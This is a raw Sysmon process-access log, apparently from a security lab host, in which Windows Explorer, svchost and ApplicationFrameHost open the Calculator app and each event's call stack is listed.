1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed
10341000x8000000000000000360341Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\system32\twinui.pcshell.dll+22359|C:\Windows\system32\twinui.pcshell.dll+20684|C:\Windows\system32\twinui.pcshell.dll+ff1f|C:\Windows\system32\twinui.pcshell.dll+c179b|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b
10341000x8000000000000000360340Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360339Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360338Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360337Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360336Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360335Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.733{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\combase.dll+a3e41|C:\Windows\System32\combase.dll+a3fc6
10341000x8000000000000000360334Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.733{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360333Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.733{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360332Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.733{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360331Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.733{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360330Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.733{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360329Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.733{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360328Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.733{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360327Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360326Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360325Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360324Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360323Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360322Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360321Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360320Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360319Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
